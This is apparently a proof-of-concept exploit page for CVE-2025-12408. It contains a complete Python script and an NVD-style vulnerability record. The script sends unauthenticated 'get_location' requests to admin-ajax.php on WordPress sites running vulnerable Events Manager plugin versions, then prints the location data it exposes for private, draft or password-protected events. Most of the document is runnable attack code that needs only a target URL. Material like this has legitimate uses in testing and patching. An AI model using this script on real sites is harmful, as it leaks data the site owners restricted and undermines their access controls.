CVE-2025-12408

#!/usr/bin/env python3 """ CVE-2025-12408 PoC - Events Manager Plugin Information Disclosure Target: WordPress with Events Manager plugin <= 7.2.2.2 Vulnerability: Insufficient access control on get_location action """ import requests import sys import re def extract_csrf_token(html): """Extract WordPress nonce from the page""" pattern = r'name="_wpnonce_ajax" value="([a-f0-9]+)"' match = re.search(pattern, html) if match: return match.group(1) # Alternative pattern pattern = r'_wpnonce[^"]*" value="([^"]+)"' match = re.search(pattern, html) return match.group(1) if match else None def poc_exploit(target_url, event_id=1): """ Exploit the information disclosure vulnerability """ print(f"[*] Target: {target_url}") print(f"[*] Testing event ID: {event_id}") # Step 1: Get initial page to obtain nonce (optional for some configurations) session = requests.Session() # Step 2: Send exploit request to get_location action exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # This action is registered without proper capability checks data = { 'action': 'get_location', 'em_obj': event_id, 'scope': 'location' } print(f"[*] Sending exploit request...") response = session.post(exploit_url, data=data, timeout=10) # Step 3: Analyze response if response.status_code == 200: print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Content-Type: {response.headers.get('Content-Type', 'N/A')}") # Check if we got location data if response.text and len(response.text) > 10: print(f"[+] Potential vulnerability confirmed!") print(f"[+] Response length: {len(response.text)} bytes") print(f"\n[+] Response preview:") print(response.text[:500]) return True else: print(f"[-] No data leaked (empty response)") return False else: print(f"[-] Request failed with status: {response.status_code}") return False def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-12408-poc.py <target_url> [event_id]") print("Example: python3 cve-2025-12408-poc.py https://example.com 1") sys.exit(1) target = sys.argv[1] event_id = int(sys.argv[2]) if len(sys.argv) > 2 else 1 poc_exploit(target, event_id) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12408", "sourceIdentifier": "[email protected]", "published": "2025-12-12T12:15:45.587", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 7.2.2.2 via the 'get_location' action due to insufficient restrictions on which locations can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft event locations that they should not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3392395/events-manager/trunk/em-actions.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8470b7be-6fae-4941-b523-93e230366522?source=cve", "source": "[email protected]"}]}}